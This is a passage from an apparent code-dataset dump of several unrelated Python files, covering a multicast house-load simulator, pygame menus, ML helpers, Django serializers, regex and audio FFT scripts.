\"priority\": 0.0,\n \"temp_out\": self.To,\n \"irradiance\": self.irradiance,\n \"signal\": self.ldc_signal,\n \"limit\": self.ourLimit,\n \"total\": self.proposedDemand,\n }\n }\n\n try:\n while self.q_proposedDemand.empty() is False:\n self.q_proposedDemand.get(block=False)\n self.q_proposedDemand.task_done()\n \n self.q_proposedDemand.put(dict_demand, block=False)\n self.dict_proposedDemand = dict_demand\n except Exception as e:\n print(\"Error in \", self.name, \" broadcast_proposed:\", e)\n pass # raised if q is empty\n\n elif state=='actual':\n dict_demand = {str(self.name):\n {\"type\": self.loadType,\n \"unixtime\": self.timestamp,\n \"house\": self.name,\n \"demand\": self.lightingLoad + self.applianceLoad,\n \"flexibility\": 0.0,\n \"priority\": 0.0,\n \"temp_out\": self.To,\n \"irradiance\": self.irradiance,\n \"signal\": self.ldc_signal,\n \"limit\": self.ourLimit,\n \"total\": self.actualDemand,\n }\n }\n try:\n while self.q_actualDemand.empty() is False:\n self.q_actualDemand.get(block=False)\n self.q_actualDemand.task_done()\n \n self.q_actualDemand.put(dict_demand, block=False)\n self.dict_actualDemand = dict_demand\n except Exception as e:\n print(\"Error in \", self.name, \"broadcast_actual:\", e)\n pass # raised if q is empty\n else:\n pass\n\n def query(self, state):\n # Ask peers about their demand and flexibility\n try:\n dict_msg = {self.name:state}\n dict_demand = MULTICAST.send(dict_msg, ip=self.mcast_ip_local, port=self.mcast_port_local)\n if state=='proposed':\n dict_demand.update(self.dict_proposedDemand)\n elif state=='actual':\n dict_demand.update(self.dict_actualDemand)\n\n df_demand = pd.DataFrame.from_dict(dict_demand, orient='index')\n df_demand = df_demand.loc[(df_demand['house']==self.name)]\n df_demand[['demand','flexibility','priority']] = df_demand[['demand','flexibility','priority']].astype(float)\n\n return df_demand\n\n except Exception as e:\n print(\"Error in \", self.name, \" query:\", e)\n print(df_demand)\n return pd.DataFrame(columns=['id','demand','flexibility','priority'])\n\n\n def decide(self):\n pass\n return\n\n\n\n\n\n def receive_ldcSignal(self):\n # Receive ldc signal\n # Note: In actual device implementation\n # this is to detect 760 - 860 Hz signal on the line\n # and going through filtering, and signal processing\n # self.ldc_signal = ldc_signal\n\n\n # get the latest ldc signal\n try:\n while self.q_ldc.empty() is False:\n self.dict_command = self.q_ldc.get(block=False)\n self.q_ldc.task_done()\n except Exception as e:\n print(\"Error in \", self.name, \" receive_ldcSignal:\", e)\n self.algorithm = list(self.dict_command)[0]\n self.ldc_signal = self.dict_command[key]\n return self.algorithm, self.ldc_signal\n\n\n def interpret_ldcSignal(self, algorithm, ldc_signal, \n minval=0.0, maxval=1.0, ldc_upper=860, ldc_lower=760):\n # convert ldc signal to a ldc command\n # signal value ranges from 760 to 860 Hz \n if algorithm=='A0':\n self.ldc_command = 1\n elif algorithm=='A1':\n # Signal means the offset deviation from target\n # when target is hit, the ldc injector sends mid frequency, ldc_command is zero, and limit is not adjusted\n # when loading is below target, ldc sends frequency above mid_freq, ldc_command is positive, limit is increased\n # when loading is above target, ldc sends frequency below mid_freq, ldc_command is negative, limit is decreased\n mid_freq = np.mean([ldc_lower,ldc_upper])\n self.ldc_command = (ldc_signal - mid_freq) / (ldc_upper-ldc_lower)\n elif algorithm=='A2':\n # Signal means the target percent loading of the transformer\n # limit is adjusted to the target percentage\n self.ldc_command = (((ldc_signal - ldc_lower) / (ldc_upper-ldc_lower)) * (maxval-minval)) + minval\n else:\n self.ldc_command = 1\n \n return self.ldc_command\n\n\n def adjust_limit(self):\n # adjust group's power limit using the ldc signal\n\n self.algorithm, self.ldc_signal = self.receive_ldcSignal()\n self.ldc_signal = float(self.ldc_signal) # ensure signal is float\n self.ldc_command = self.interpret_ldcSignal(self.algorithm, self.ldc_signal)\n\n if self.algorithm=='A0':\n self.ourLimit = self.housePower\n elif self.algorithm=='A1':\n # option 1, uses percent offset from the target\n # Since ldc_command means to ramp up or ramp down,e.g., positive or negative deviation\n # power limit is added (or subtracted) with the fraction of the housePower\n # with lower and upper limits at 0% to 150% correspondingly\n self.ourLimit += self.housePower * self.ldc_command\n self.ourLimit = np.clip(self.ourLimit,0.0, self.housePower*1.5,)\n elif self.algorithm=='A2':\n # option 2, uses percentage loading target\n # Since ldc_command means the the desired loading level\n # power limit is adjusted to such percentage loading\n self.ourLimit = self.housePower * self.ldc_command\n else:\n self.ourLimit = self.housePower\n\n return self.ourLimit\n \n\n def record_history(self):\n [load.record_history() for load in self.loads] # let all loads record its history\n self.timeHistory.append(self.timestamp)\n self.flexibilityHistory.append(self.flexibility)\n self.proposedDemandHistory.append(self.proposedDemand)\n self.actualDemandHistory.append(self.actualDemand)\n\n\n #--- BACKGROUND THREADS ---\n def receive_mcast(self):\n # Receive multicast message from the group\n multicast_ip = self.mcast_ip_local\n port = self.mcast_port_local\n\n multicast_group = (multicast_ip, port) # (ip_address, port)\n\n # Create the socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # Bind to the server address\n sock.bind(multicast_group)\n\n # Tell the operating system to add the socket to\n # the multicast group on all interfaces.\n group = socket.inet_aton(multicast_ip)\n mreq = struct.pack('4sL', group, socket.INADDR_ANY)\n sock.setsockopt(\n socket.IPPROTO_IP,\n socket.IP_ADD_MEMBERSHIP,\n mreq)\n \n dict_toSend_proposed= {}\n dict_toSend_actual= {}\n # Receive/respond loop\n while True:\n # receive and decode message\n data, address = sock.recvfrom(1024)\n received_msg = data.decode(\"utf-8\")\n dict_msg = ast.literal_eval(received_msg)\n # prepare data to send, fetch latest data from the queue\n try:\n # Note: house name is used as the key, 'all' is a query from the aggregator \n for key in dict_msg: \n if key in [self.name, \"all\"]: \n if dict_msg[key] in [\"proposed\", \"p\"]:\n while self.q_proposedDemand.empty(): pass\n dict_onQueue_proposed = self.q_proposedDemand.get(block=False)\n self.q_proposedDemand.put(dict_onQueue_proposed)\n self.q_proposedDemand.task_done()\n\n dict_toSend_proposed.update(dict_onQueue_proposed)\n message_toSend_proposed = str(dict_toSend_proposed).encode()\n\n # send message\n sock.sendto(message_toSend_proposed, address)\n \n elif dict_msg[key] in [\"actual\", \"a\"]:\n while self.q_actualDemand.empty(): pass\n dict_onQueue_actual = self.q_actualDemand.get(block=False)\n self.q_actualDemand.put(dict_onQueue_actual)\n self.q_actualDemand.task_done()\n\n dict_toSend_actual.update(dict_onQueue_actual)\n message_toSend_actual = str(dict_toSend_actual).encode()\n \n # send message\n sock.sendto(message_toSend_actual, address)\n\n\n # elif dict_msg[key]==\"ldc\":\n # while self.q_actualDemand.empty() is False:\n # dict_onQueue_actual = self.q_actualDemand.get(block=False)\n # self.q_actualDemand.task_done()\n\n else:\n pass\n else:\n pass\n except Exception as e:\n print(\"Error in \", self.name, \" receive_mcast: \", e)\n pass \n return\n\n\n def receive_mcast_global(self):\n # Receive peers' operation status (e.g., demand, flexibility)\n # Receive multicast message from the group\n multicast_ip = self.mcast_ip_global\n port = self.mcast_port_global\n \n multicast_group = (multicast_ip, port) # (ip_address, port)\n\n # Create the socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # Bind to the server address\n sock.bind(multicast_group)\n\n # Tell the operating system to add the socket to\n # the multicast group on all interfaces.\n group = socket.inet_aton(multicast_ip)\n mreq = struct.pack('4sL', group, socket.INADDR_ANY)\n sock.setsockopt(\n socket.IPPROTO_IP,\n socket.IP_ADD_MEMBERSHIP,\n mreq)\n \n dict_toSend_proposed= {}\n dict_toSend_actual= {}\n # Receive/respond loop\n while True:\n # receive and decode message\n data, address = sock.recvfrom(1024)\n received_msg = data.decode(\"utf-8\")\n dict_msg = ast.literal_eval(received_msg)\n # prepare data to send, fetch latest data from the queue\n try:\n # Note: house name is used as the key, 'all' is a query from the aggregator \n for key in dict_msg: \n if key in [self.name, \"all\"]: \n if dict_msg[key] in [\"proposed\", \"p\"]:\n while self.q_proposedDemand.empty(): pass\n dict_onQueue_proposed = self.q_proposedDemand.get(block=False)\n self.q_proposedDemand.put(dict_onQueue_proposed)\n self.q_proposedDemand.task_done()\n\n dict_toSend_proposed.update(dict_onQueue_proposed)\n message_toSend_proposed = str(dict_toSend_proposed).encode()\n\n # send message\n sock.sendto(message_toSend_proposed, address)\n \n elif dict_msg[key]in [\"actual\", \"a\"]:\n while self.q_actualDemand.empty(): pass\n dict_onQueue_actual = self.q_actualDemand.get(block=False)\n self.q_actualDemand.put(dict_onQueue_actual)\n self.q_actualDemand.task_done()\n\n dict_toSend_actual.update(dict_onQueue_actual)\n message_toSend_actual = str(dict_toSend_actual).encode()\n \n # send message\n sock.sendto(message_toSend_actual, address)\n\n\n # elif dict_msg[key]==\"ldc\":\n # while self.q_actualDemand.empty() is False:\n # dict_onQueue_actual = self.q_actualDemand.get(block=False)\n # self.q_actualDemand.task_done()\n\n else:\n pass\n else:\n pass\n except Exception as e:\n print(\"Error in \", self.name, \" receive_mcast_global: \", e)\n pass \n return\n\n\n\n # def drive_chroma(self):\n # # Send data to Chroma variable load simulator\n # # through serial interface (rs232)\n # ser = serial.Serial(\n # port='/dev/ttyAMA0',\n # baudrate = 57600,\n # parity=serial.PARITY_NONE,\n # stopbits=serial.STOPBITS_ONE,\n # bytesize=serial.EIGHTBITS,\n # timeout=1\n # )\n\n # # send command to load simulator\n # ser.write('[LOAD:]POW[:LEV][:AMPL][:AC] '+ str(self.demand))\n # ser.write(':POW ' + str(self.demand))\n # # measure apparent power\n # VA = ser.write(':MEAS:POW:APP?')\n # # measure real power\n # WATT = ser.write(':MEAS:POW?')\n # # measure reactive power\n # VAR = ser.write(':MEAS:POW:REAC?')\n # # measure power factor\n # PF = ser.write(':MEAS:POW:PFAC?')\n # # measure frequency\n # FREQ = ser.write(':MEAS:FREQ?')\n\n\n\n\n def step(self):\n # simulation step for the house and all loads therein\n\n\n # t = time.perf_counter() # to record time lapse\n # self.update_data()\n # sumGen = [gen.get_powerOutput() for gen in self.generators]\n # [gen.record_History() for gen in self.generators]\n # [load.propose_demand() for load in self.loads]\n # self.df_proposedDemand = self.query(state=\"proposed\")\n # self.proposedDemand = np.sum(self.df_proposedDemand['demand']) + self.lightingLoad + self.applianceLoad\n # [load.decide() for load in self.loads]\n # [load.update_demand() for load in self.loads]\n # self.df_actualDemand = self.query(state=\"actual\")\n # self.actualDemand = np.sum(self.df_actualDemand['demand']) + self.lightingLoad + self.applianceLoad\n # self.flexibility = np.mean([load.flexibility for load in self.loads])\n # [load.simulate_model() for load in self.loads]\n\n #---display total time lapsed for one simulation step\n # print(\"Proposed demand: \", self.proposedDemand, \n # \" Actual demand: \", self.actualDemand,\n # \" Avg flexibility: \", self.flexibility,\n # \" LDC Signal: \", self.ldc_signal,\n # )\n # print(time.perf_counter()-t)\n\n while True:\n try:\n t = time.perf_counter() # to record time lapse\n self.clock.step()\n self.update_data()\n # print(self.timestamp, self.name, self.lightingLoad, self.applianceLoad)\n # time.sleep(np.random.normal(5,1))\n self.df_proposedDemand = self.query(state=\"proposed\")\n self.proposedDemand = np.sum(self.df_proposedDemand['demand']) + self.lightingLoad + self.applianceLoad\n self.df_actualDemand = self.query(state=\"actual\")\n self.actualDemand = np.sum(self.df_actualDemand['demand']) + self.lightingLoad + self.applianceLoad\n self.flexibility = np.mean(self.df_actualDemand['flexibility'])\n # time.sleep(abs(np.random.normal(3,3)))\n \n print(\"unixtime:\", self.timestamp, \" house:\", self.name, \" proposed:\", self.proposedDemand, \" actual:\", self.actualDemand, \"limit:\", self.ourLimit)\n except Exception as e:\n print(\"Error in \", self.name, \" step:\", e)\n \n\n\n################### TEST CALLS #################################################################################\n\n\n################################################################################################################\n\n\n","sub_path":"ldc_system/HOUSE.py","file_name":"HOUSE.py","file_ext":"py","file_size_in_byte":33222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145978141","text":"import os\nimport re\n\npattern = r\"描述.*(controller|控制器).*\"\nrx = re.compile(pattern,re.IGNORECASE)\n\nallinfo = os.popen(\"ipconfig -all\").readlines()\nfor line in allinfo:\n #匹配到行 返回行号\n if rx.search(line):\n n = allinfo.index(line)\n break\nnetinfo = allinfo[n:n+6] #切分包含ip的子序列\nfor line in netinfo:\n if \"IPv4\" in line:\n ip = line.split(':')[1].split('(')[0].strip() #用split()拆分,strip()去空格。\n print(ip)\n break\nelse:\n print(\"未插网线或未打开设备!\")\n\n","sub_path":"getIP.py","file_name":"getIP.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"250417015","text":"class Operand():\n\n DEFAULT_PARAM1 = 0\n DEFAULT_PARAM2 = 0\n DEFAULT_PARAM3 = \"PLUS1\"\n\n def __init__(self, param1:int = DEFAULT_PARAM1, param2: int = DEFAULT_PARAM2, param3: str =DEFAULT_PARAM3):\n self.param1 = param1\n self.param2 = param2\n self.param3 = param3\n \n @staticmethod\n def func(param1,param2,param3):\n try:\n if(str.upper(param3) == \"PLUS1\"):\n return Operand.fnc_plus1(param1,param2)\n elif(str.upper(param3) == \"KUADRAT\"):\n return Operand.fnc_kuadrat(param1,param2)\n elif(str.upper(param3) == \"FIBONACCI\"):\n return Operand.fnc_fibonacci(param1,param2)\n else:\n return \"Menu doesn't exists\"\n except:\n return \"Please input valid parameter (int, int, str)\"\n\n def fnc_plus1(param1, param2):\n list_plus1=[]\n # list_plus1 = list(range(param1,param2+1)) #CaraCepatPlus1\n try:\n for plus in range(param1, param2+1):\n # print(\"Ke {}\".format(plus))\n if(plus == param1):\n list_plus1.append(param1)\n else:\n param1=param1+1\n if(param1<=param2):\n list_plus1.append(param1)\n return list_plus1 \n except TypeError:\n return \"Please input valid integer\"\n # print(\"Plus 1 : function ({},{},'{}') -> {}\".format(self.param1,self.param2,self.param3,list_plus1))\n\n def fnc_kuadrat(param1, param2):\n list_exponent=[]\n kuadrat_result = 0\n iteration = 1\n try:\n while(kuadrat_result<=param2):\n kuadrat_result=param1**iteration\n print(\"Ke {}, Kuadrat: {}\".format(iteration, kuadrat_result))\n if(kuadrat_result<=param2):\n list_exponent.append(kuadrat_result)\n iteration = iteration+1\n return list_exponent\n except TypeError:\n return \"Please input valid integer\"\n # print(\"Kuadrat : function ({},{},'{}') -> {}\".format(self.param1,self.param2,self.param3,list_exponent))\n\n def fnc_fibonacci(param1, param2):\n list_fbnc=[]\n curr_val = 0\n prev_val = 1\n stt=0\n #0,1,1,2,3,5,8,13,21,34\n try:\n while(stt<=param2):\n if(stt>=param1):\n list_fbnc.append(stt)\n curr_val=stt+prev_val\n prev_val=stt\n stt=curr_val\n return list_fbnc\n # print(\"Fibonacci : function ({},{},'{}') -> {}\".format(self.param1,self.param2,self.param3,list_fbnc))\n except TypeError:\n return \"Please input valid integer\"","sub_path":"session11/src/service/operand.py","file_name":"operand.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653560889","text":"import pygame\nimport utils, cfg\nfrom pygame.locals import *\nimport sys\n\n\nclass WinMessage:\n\n continue_button = K_SPACE\n exit = K_ESCAPE\n\n def __init__(self):\n pygame.font.init()\n self.font = pygame.font.SysFont('TimesNewRoman', 30)\n self.winner = 'I do not know'\n\n def draw(self, screen):\n \"\"\"This is the function that gets called to actually display on the screen.\"\"\"\n #textsurface = self.myfont.render('Congratulations! You found each other!', False, (0, 0, 0))\n text=\"Congratulations, {}! You Won! \\n \\nTo play again press the Space Button \\n \\nIf you want to exit the game, Press ESC\".format(self.winner)\n screen.fill((75,166,193))\n utils.blit_text(screen, text, (99,250), self.font)\n\n def run(self, screen):\n while True:\n self.draw(screen)\n pygame.display.flip()\n for event in pygame.event.get():\n if event.type == KEYUP:\n if event.key == self.continue_button:\n return\n\n if event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n\n\nclass StartGame:\n\n easy_mode=K_1\n normal_mode=K_2\n hard_mode=K_3\n\n def __init__(self):\n pygame.font.init()\n self.font = pygame.font.SysFont('TimesNewRoman', 25)\n\n def draw(self, screen):\n \"\"\"This is the function that gets called to actually display on the screen.\"\"\"\n text = \"Welcome to the Game! \\n \\nTo start the game please press the following buttons \\n \\n-To play an Easy Mode Press 1 \\n \\n-To Play a Normal Mode Press 2 \\n \\n-To Play a Hard Mode Press 3\"\n #textsurface = self.font.render(\"This is Start Screen \\nPress the Space Button to start\", False, (0, 0, 0))\n screen.fill((75,166,193))\n utils.blit_text(screen, text, (99,150), self.font)\n return\n\n def run(self, screen):\n while True:\n self.draw(screen)\n pygame.display.flip()\n for event in pygame.event.get():\n if event.type == KEYUP:\n if event.key == self.easy_mode:\n cfg.ai_players = 3\n cfg.ai_move_probability = 1\n return\n if event.key == self.normal_mode:\n cfg.ai_players = 7\n cfg.ai_move_probability = 5\n return\n if event.key == self.hard_mode:\n cfg.ai_players = 15\n cfg.ai_move_probability = 10\n return\n if event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n\nclass GameText:\n\n continue_button = K_SPACE\n\n def __init__(self):\n pygame.font.init()\n self.font = pygame.font.SysFont('TimesNewRoman', 25)\n\n def draw(self, screen):\n \"\"\"This is the function that gets called to actually display on the screen.\"\"\"\n text = \"How to Play the Game!? \\n \\n-To move up - Press the Up or W Button \\n \\n-To move down - Press the Down or S Button \\n \\n-To move left - Press the Left or A Button \\n \\n-To move right - Press the Right or D Button \\n \\nReady to Start? \\nLet's Go! Press the Space Button!\"\n screen.fill((75,166,193))\n utils.blit_text(screen, text, (30,30), self.font)\n\n def run(self, screen):\n while True:\n self.draw(screen)\n pygame.display.flip()\n for event in pygame.event.get():\n if event.type==KEYUP:\n if event.key ==self.continue_button:\n return\n if event.key==K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n\n\n\n\n","sub_path":"colorgame/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81723442","text":"import io\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import confusion_matrix\n\nimport tensorflow as tf\nfrom tensorflow.keras.applications import MobileNetV2\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\n\ndef get_confusion_matrix(y_true, y_pred, class_names, normalize='pred'):\n\n # get the confusion matrix\n cnf = confusion_matrix(y_true=y_true, y_pred=y_pred, normalize=normalize)\n df_cm = pd.DataFrame(cnf, index=class_names, columns=class_names)\n\n # plot it using seaborn\n plt.figure(figsize = (9,8))\n ax = sns.heatmap(df_cm, annot=True, cmap=\"Blues\")\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n buf = io.BytesIO()\n plt.savefig(buf, format='png')\n \n # Closing the figure prevents it from being displayed directly inside the notebook.\n plt.close(ax.figure)\n buf.seek(0)\n \n # Use tf.image.decode_png to convert the PNG buffer\n # to a TF image. Make sure you use 4 channels.\n image = tf.image.decode_png(buf.getvalue(), channels=4)\n \n # Use tf.expand_dims to add the batch dimension\n image = tf.expand_dims(image, 0)\n\n return image\n\ndef create_model():\n \n # Creating a mobilenet backbone\n backbone = MobileNetV2(weights = 'imagenet', include_top = True, input_shape=(224,224,3))\n # Removing the last classification layer to adapt it to our classification problem (5 classes)\n backbone.layers.pop()\n\n # Creating a sequatial model with a mobilenetv2 backbone and a dense layer\n model = Sequential()\n model.add(backbone)\n model.add(Dense(5, activation='softmax', name='predictions'))\n \n return model\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"480323124","text":"from rest_framework import serializers\nfrom .models import Category, Products\n\nclass ProductsSerializer(serializers.ModelSerializer):\n class Meta:\n model = Products\n fields = (\n \"id\",\n \"name\",\n \"get_absolute_url\",\n \"description\",\n \"price\",\n \"get_image\",\n \"get_thumbnail\"\n )\n\nclass CategorySerializer(serializers.ModelSerializer):\n products = ProductsSerializer(many=True)\n\n class Meta:\n model = Category\n fields = (\n \"id\",\n \"name\",\n \"slug\",\n \"products\",\n \"get_absolute_url\",\n )\n","sub_path":"django_backend/products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"300217131","text":"import numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndata = np.random.randint(0, 100, (10, 2))\n\nscaler_model = MinMaxScaler()\n# 最小を0に最大を1にする前処理\n\nscaler_model.fit(data)\nprint(scaler_model.transform(data))\n# scaler_modelの処理をdataに適応\n\n# scaler_model.fit_transform(data)\n# fitとtransformを一度に実行\n\n\n## Scikit-learnでのテストデータ作成サンプル\nmydata = pd.DataFrame(data=np.random.randint(0, 101, (50, 4)), columns=['f1', 'f2', 'f3', 'label'])\ndf = pd.DataFrame(data=mydata)\nx = df[['f1', 'f2', 'f3']]\n# dfからf1, f2, f3カラムだけ抽出\n\ny = df['label']\n# dfからlabelだけ抽出\n\nX_train, X_test, Y_train, Y_test = train_test_split(\n x, y, test_size=0.3, random_state=42\n)\n# xとyからテストデータと学習データを分割して作成\n# test_size: テストデータの割合\n# random_state: 乱数のシード値。これを指定することで実行のたびに同じランダムの結果になる\n# X_train: トレーニング用の特徴行列\n# X_test: テスト用の特徴行列\n# Y_train: トレーニング用の目的変数\n# Y_test: テスト用の目的変数\n\nprint(df)\nprint(X_train)\nprint(X_test.shape)\n# X_train, X_testの形を表示","sub_path":"Deeplearning_lecture/lecture_1/sklearn-sample1.py","file_name":"sklearn-sample1.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"571533515","text":"class ActionHandler(object):\n def __init__(self):\n self.description = \"Generic Action Handler\"\n \n def help(self):\n return \"Unimplemented\"\n\n def do(self, state):\n return state\n \nclass Move(ActionHandler):\n def do(self, state):\n \"\"\"\n state - a dictionary containing the games state.\n Checks for exits in the proper direction and returns the new room if true,\n otherwise false.\n \"\"\"\n action = state[\"action\"].split()\n if len(action) > 1:\n if len(action[1]) > 0:\n state[\"location\"] = state[\"objects\"][state[\"location\"].attachments[action[1]]]\n state[\"action\"] = \"look\"\n # This calls the Look action directly, there is probably a \n # better way to do this.\n look = Look()\n state = look.do(state)\n else:\n state[\"message\"].append(\"There are no exits that way.\") \n else:\n state[\"message\"].append(\"Which direction?\")\n \n return state\n\nclass Look(ActionHandler):\n def do(self, state):\n \"\"\"\n state - a dictionary containing the game state.\n Re-prints the room's play description or inspects an object in the room.\n \"\"\"\n action = state[\"action\"].split()\n if(len(action) > 1):\n # I don't remember what I was doing here...\n return state\n else:\n state[\"message\"].append(state[\"location\"].description)\n if len(state[\"location\"].contents) > 0:\n contents = \", a \".join(\"[%s]\" % k for k in state[\"location\"].contents.values())\n else:\n contents = \"nothing\" \n state[\"message\"].append(\"This room contains a %s.\" % contents)\n\n return state\n ","sub_path":"Utopia/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440640524","text":"import subprocess\nimport sys\nimport pandas as pd\nimport numpy as np\nimport math\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\n\ndef runcmd(cmd, verbose=False):\n sproc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, \n stdout=subprocess.PIPE, stderr=subprocess.PIPE, )\n output = ''\n numlines = 0\n error = True\n while True:\n if error:\n line = sproc.stderr.readline().decode(\"utf-8\")\n if line == '' and (sproc.poll() is None or sproc.poll() == 0):\n error = False\n if not error:\n line = sproc.stdout.readline().decode(\"utf-8\")\n if line == '' and sproc.poll() is not None:\n break\n if verbose:\n sys.stdout.write(line)\n sys.stdout.flush()\n output = output + line\n numlines = numlines + 1\n return error, output.strip(), numlines\n\ndef make_dummies_with_limits(df, colname, min_recs=0.005,\\\n max_dummies=20, defcatname='Other',\\\n nospacechr='_'):\n if min_recs < 1:\n min_recs = df.shape[0]*min_recs\n topvals_df = df.groupby(colname).size().reset_index(name=\"counts\").\\\n sort_values(by=\"counts\", ascending=False).reset_index()\n other_l = topvals_df[(topvals_df.index > max_dummies) |\\\n (topvals_df.counts < min_recs)][colname].to_list()\n if len(other_l):\n df.loc[df[colname].isin(other_l), colname] = defcatname\n if len(nospacechr):\n df[colname] = df[colname].str.replace(' ',\\\n nospacechr, regex=False)\n return pd.get_dummies(df, prefix=[colname], columns=[colname])\n\ndef make_dummies_from_dict(df, colname, match_dict, \n drop_orig=True, nospacechr='_'):\n if type(match_dict) is list:\n if len(nospacechr):\n match_dict = {match_key:match_key.\\\n replace(' ', nospacechr)\\\n for match_key in match_dict }\n else:\n match_dict = {match_key:match_key\\\n for match_key in match_dict}\n for match_key in match_dict.keys():\n df[colname+'_'+match_dict[match_key]] =\\\n np.where(df[colname].str.contains(match_key), 1, 0)\n if drop_orig:\n return df.drop([colname], axis=1)\n else:\n return df\n \ndef evaluate_class_mdl(fitted_model, X_train, X_test, y_train, y_test):\n y_train_pred = fitted_model.predict(X_train)\n y_test_prob = fitted_model.predict_proba(X_test)[:,1]\n y_test_pred = np.where(y_test_prob > 0.5, 1, 0)\n roc_auc = metrics.roc_auc_score(y_test, y_test_prob)\n plt.figure(figsize = (12,12))\n plt.tick_params(axis = 'both', which = 'major', labelsize = 12)\n fpr, tpr, _ = metrics.roc_curve(y_test, y_test_prob)\n plt.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % roc_auc)\n plt.plot([0, 1], [0, 1], 'k--') # coin toss line\n plt.xlabel('False Positive Rate', fontsize = 14)\n plt.ylabel('True Positive Rate', fontsize = 14)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.0])\n plt.legend(loc=\"lower right\")\n plt.show()\n print('Accuracy_train: %.4f\\t\\tAccuracy_test: %.4f' %\\\n (metrics.accuracy_score(y_train, y_train_pred),\\\n metrics.accuracy_score(y_test, y_test_pred)))\n print('Precision_test: %.4f\\t\\tRecall_test: %.4f' %\\\n (metrics.precision_score(y_test, y_test_pred),\\\n metrics.recall_score(y_test, y_test_pred)))\n print('ROC-AUC_test: %.4f\\t\\tF1_test: %.4f\\t\\tMCC_test: %.4f' %\\\n (roc_auc,\\\n metrics.f1_score(y_test, y_test_pred),\\\n metrics.matthews_corrcoef(y_test, y_test_pred)))\n return y_train_pred, y_test_prob, y_test_pred\n","sub_path":"Chapter6/mldatasets/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"194327094","text":"\"\"\"\nKel Kanhirun \npython v3.4.1\nJan. 22, 2015\n\n@description\nA (Python) solution to an example problem posed in Mastering Regular\nExpressions by Jeffrey Friedl.\n\n@notes\nAccording to Friedl, regexp is intertwined with logic which is evident for in\nthe pattern below.\n\nI learned...\n\n1. For the _example_ for 10.00, we can no longer return an object of type\n 'float' if we wish to satisfy the requirement. Therefore, I decided to use\n `decimal.Decimal` which can express '10.00' and is often used in dealing\n with financial transactions.\n\nI experimented with...\n1. expressing nested subexpressions in Lisp-style\n\"\"\"\n\nimport re\nfrom decimal import Decimal as D\n\n\ndef pp_stock_price(stock_price):\n result = match_stock_price(stock_price)\n\n return D(result) if result else None\n\n\ndef match_stock_price(string):\n pp_pattern = \"\"\"\n (\\d+\n (\\.\\d{2}[^0]?)?)\n \"\"\"\n match = re.match(pp_pattern, string, re.VERBOSE)\n\n return match.group() if match else None\n","sub_path":"Mastering Regular Expressions/pp_stock_price/pp_stock_price.py","file_name":"pp_stock_price.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"531438889","text":"import pyaudio\nimport numpy as np\nimport time\nfrom scipy.fftpack import fft, ifft\nfrom scipy.signal import lfilter\nimport matplotlib.pyplot as plt\n# import pyttsx3\nimport tkinter\nimport GUI\n\nCHUNK = 1024 # number of data points to read at a time\nRATE = 44100 # time resolution of the recording device (Hz)\n\np=pyaudio.PyAudio() # start the PyAudio class\nstream=p.open(format=pyaudio.paInt16,channels=1,rate=RATE,input=True,\n frames_per_buffer=CHUNK) #uses default input device\n\n# engine = pyttsx3.init()\n\n\n# create a numpy array holding a single read of audio data\noverall = np.array([0])\nconverted = np.array([0])\nma = -1\n#window = tkinter.Tk()\n#gui = GUI.GraphicalInterface(window)\n#window.mainloop()\nmaxes = []\nwhile(True):\n try:\n #parses data from microphone\n data = np.fromstring(stream.read(CHUNK), dtype=np.int16)\n #checks if its silent\n \"\"\"silent = False\n if max(data) == 1 or min(data) == -1:\n silent = True\n if silent:\n data = [0]\n\n if max(data) > ma:\n ma = max(data)\n print(len(overall))\"\"\"\n\n #removes oldest values\n overall = overall[CHUNK:]\n overall = np.append(overall, data)\n y = fft(overall)\n deci = 10.*np.log10(abs(y))\n filtered = lfilter([1.0 / 100] * 100, 1, deci )\n ma = np.max(y)\n # Number of samplepoints\n N = 600\n # sample spacing\n T = 1.0 / 600.0\n x = np.linspace(0.0, 1.0/( 2.0 *T), N/2)\n #plt.plot(x, 2.0/N * np.abs(y[:N//2]))\n plt.plot(filtered[:len(filtered)//2])\n #v = plt.plot(overall)\n #sets limits on the y axis\n 